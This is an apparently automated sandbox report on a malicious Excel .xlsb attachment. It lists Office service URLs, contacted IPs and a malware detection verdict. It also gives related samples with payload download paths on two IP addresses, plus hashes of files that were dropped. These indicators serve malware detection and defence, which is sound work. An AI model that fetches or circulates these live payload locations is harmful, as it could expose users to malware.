      https://login.microsoftonline.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
        high
        https://shell.suite.office.com:1443677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
            high
            https://autodiscover-s.outlook.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
              high
              https://roaming.edog.677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
              • URL Reputation: safe
              unknown
              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                high
                https://cdn.entity.677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                • URL Reputation: safe
                unknown
                https://api.addins.omex.office.net/appinfo/query677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                  high
                  https://clients.config.office.net/user/v1.0/tenantassociationkey677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                    high
                    https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                      high
                      https://powerlift.acompli.net677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://rpsticket.partnerservices.getmicrosoftkey.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                      • URL Reputation: safe
                      unknown
                      https://lookup.onenote.com/lookup/geolocation/v1677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                        high
                        https://cortana.ai677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                        • URL Reputation: safe
                        unknown
                        https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                          high
                          https://cloudfiles.onenote.com/upload.aspx677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                            high
                            https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                              high
                              https://entitlement.diagnosticssdf.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                high
                                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                  high
                                  https://api.aadrm.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://ofcrecsvcapi-int.azurewebsites.net/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                    high
                                    https://api.microsoftstream.com/api/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                      high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                        high
                                        https://cr.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                          high
                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                          • Avira URL Cloud: safe
                                          low
                                          https://portal.office.com/account/?ref=ClientMeControl677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                            high
                                            https://graph.ppe.windows.net677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.aadrm.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                        high
                                                        https://dev0-api.acompli.net/autodetect677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.diagnosticssdf.office.com/v2/feedback677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                          high
                                                          https://api.powerbi.com/v1.0/myorg/groups677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                            high
                                                            https://web.microsoftstream.com/video/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                              high
                                                              https://api.addins.store.officeppe.com/addinstemplate677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://graph.windows.net677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                high
                                                                https://dataservice.o365filtering.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://officesetup.getmicrosoftkey.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://analysis.windows.net/powerbi/api677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                  high
                                                                  https://prod-global-autodetect.acompli.net/autodetect677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.json677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                    high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                      high
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                        high
                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                          high
                                                                          https://ncus.contentsync.677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                            high
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                              high
                                                                              http://weather.service.msn.com/data.aspx677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                high
                                                                                https://apis.live.net/v5.0/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                  high
                                                                                  https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                    high
                                                                                    https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                      high
                                                                                      https://management.azure.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                        high
                                                                                        https://outlook.office365.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                          high
                                                                                          https://wus2.contentsync.677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://incidents.diagnostics.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                            high
                                                                                            https://clients.config.office.net/user/v1.0/ios677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                              high
                                                                                              https://insertmedia.bing.office.net/odc/insertmedia677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                high
                                                                                                https://o365auditrealtimeingestion.manage.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                  high
                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                    high
                                                                                                    https://api.office.net677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                      high
                                                                                                      https://incidents.diagnosticssdf.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                        high
                                                                                                        https://asgsmsproxyapi.azurewebsites.net/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        https://clients.config.office.net/user/v1.0/android/policies677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                          high
                                                                                                          https://entitlement.diagnostics.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                            high
                                                                                                            https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                              high
                                                                                                              https://substrate.office.com/search/api/v2/init677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                  high
                                                                                                                  https://storage.live.com/clientlogs/uploadlocation677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.office365.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                      high
                                                                                                                      https://webshell.suite.office.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                        high
                                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                          high
                                                                                                                          https://substrate.office.com/search/api/v1/SearchHistory677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                            high
                                                                                                                            https://management.azure.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                              high
                                                                                                                              https://login.windows.net/common/oauth2/authorize677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                high
                                                                                                                                https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://graph.windows.net/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://api.powerbi.com/beta/myorg/imports677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://devnull.onenote.com677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://ncus.pagecontentsync.677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://messaging.office.com/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://augloop.office.com/v2677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://skyapi.live.net/Activity/677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://clients.config.office.net/user/v1.0/mac677FD6E0-62B9-474C-AF43-C7CFF6021AF1.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  185.141.26.236
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  60117HSAEfalse
                                                                                                                                                  185.252.215.41
                                                                                                                                                  unknownRussian Federation
                                                                                                                                                  49619AIRMOBFRfalse
                                                                                                                                                  188.165.62.32
                                                                                                                                                  unknownFrance
                                                                                                                                                  16276OVHFRfalse
                                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                  Analysis ID:573121
                                                                                                                                                  Start date:16.02.2022
                                                                                                                                                  Start time:09:19:12
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 6m 14s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Summary-133608431-Feb-15.xlsb
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:28
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal80.expl.evad.winXLSB@7/5@0/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsb
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 52.109.76.68, 52.109.8.22, 20.54.7.98, 20.54.104.15
                                                                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, www-bing-com.dual-a-0001.a-msedge.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  No simulations
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  185.141.26.236Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236/5679372910751440.dat
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236/6516776391132270.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236/2437620704597850.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236/1825066150275900.dat
                                                                                                                                                  185.252.215.41Summary-133608431-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/2273529117599590.dat
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/5679372910751440.dat
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/6516776391132270.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/2437620704597850.dat
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41/1825066150275900.dat
                                                                                                                                                  No context
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  AIRMOBFRSummary-133608431-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.252.215.41
                                                                                                                                                  HSAESummary-133608431-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  Summary-313689350-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  Summary-573686706-Feb-15.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.26.236
                                                                                                                                                  ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  H7LG5mteEK.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.150.84
                                                                                                                                                  XKPppNZNEj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.150.84
                                                                                                                                                  eeb0c6a760a7c9d17c02dbacf4f4715917caf3d111209.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.117.75.139
                                                                                                                                                  ub6vBoyZmA.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.82.202.246
                                                                                                                                                  Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  Secure_Message_81.90.a1.00.00.htmGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  ATT72994.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 185.141.25.244
                                                                                                                                                  Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.149.81
                                                                                                                                                  Calculation-Letter-1683223396-Jan-25.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.244.149.81
                                                                                                                                                  Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.106.123.107
                                                                                                                                                  Calculation-1889969399-Jan-24.xlsbGet hashmaliciousBrowse
                                                                                                                                                  • 185.106.123.107
                                                                                                                                                  hrttshkxhj.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.198.57.61
                                                                                                                                                  DG3kRWrQrf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 185.198.57.61
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):143624
                                                                                                                                                  Entropy (8bit):5.3584119766763205
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:scQIfgxrBdA3guwu/Q9DQW+zUk4F77nXmvidZXtE5LWm69:QaQ9DQW+zwXCe
                                                                                                                                                  MD5:BB20CA6E7E8565F8D8DBE0E1E518B482
                                                                                                                                                  SHA1:59442D235B0D2CC100F4760B6DA2CECC5CFC50BF
                                                                                                                                                  SHA-256:E596DF2D99CF84DABCFE42ABDA541BEEC08DE3253870719A682979F85AC0012E
                                                                                                                                                  SHA-512:4FFCD594F70616A20BF4041783FCB1A2E74D33B2089F8E0BC40F53833DDFE904CF5AA4212B981C8C123BC04BF9E70BE5B84594353B8D883F6D654B1B2B50952C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-02-16T08:20:11">.. Build: 16.0.15004.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1536
                                                                                                                                                  Entropy (8bit):1.1464700112623651
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                                                                                                                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                                                                                                                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                                                                                                                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                                                                                                                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 1152 x 649, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):241202
                                                                                                                                                  Entropy (8bit):7.994790738722079
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:6144:LafQTxwGF4p24e6RoPmj6M7R6SFENKq4WneZ:LacxGgF62PFNJno
                                                                                                                                                  MD5:970E90E800998F92DF619BFA12784EDE
                                                                                                                                                  SHA1:9602E3700EAE62493E6109B5A1592C53A75DA62C
                                                                                                                                                  SHA-256:085DF183667B5E23760879126ADEF853988D519E39C18B5A7EBA4B17423D7B6C
                                                                                                                                                  SHA-512:74926BDFA17E196D1A885F9FF51B139B14865430C494E6B598E8B05A8B3D1C6C2D0FF314D871F1074F367CBA5E7BD82CF050D1EBC29A46BA3E39B851E4049D0A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview:.PNG........IHDR.............L.......sRGB.........gAMA......a.....pHYs..........+......IDATx^....E...3.{.&....0g..3.....y.w.%..y'...DA..$.Qr.9.,..%m..S=;,mX...x=..8..TW.......vP.V..Z.Kl> .h60...z@....rP...z..]<../9...9...9....p.%...%...%..\..n........W.C...p.%..\..n....W'../9....p.....:1.~.1.W'..8.....K.!.:1.~.1D.N.._r.....K.!.K.!.K.!.:1.~i....F......Nl:$A...d../.f../mr..2.... .t.........4.Y...g..7W..c.1\.!.~..O#.....5...apV'...9.......g..QN.....x{...b...!.K.!.K.!.:1....1.....\....a....!zub.=.!91.....\....a....!zub...c..N.....m..n.apV'.....K.!.:1$?...:1....,..Y.C.....%..\..n.?c...g1..b..W'..c...?c..N.._r..]r.......3....p.........S.}...."...`.....W.uLk..l=...%=8KP.<......7!A.)`2.8...~.......,..Y..n.ap......g1..b.......g....1...9..b....0$'...%..\..3.Eb....gub.=....<...08....1..b...08.j1dK.....g1....p{..3.Eb....g.3p~.0.h..<.M/^D.`.....Y.v.mv..........zI.a......sa.~......~.S......08....1..~s.....,..Y...:1.....q...1...%..\........08.....ap.H.....N...08....
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):512
                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3::
                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):165
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
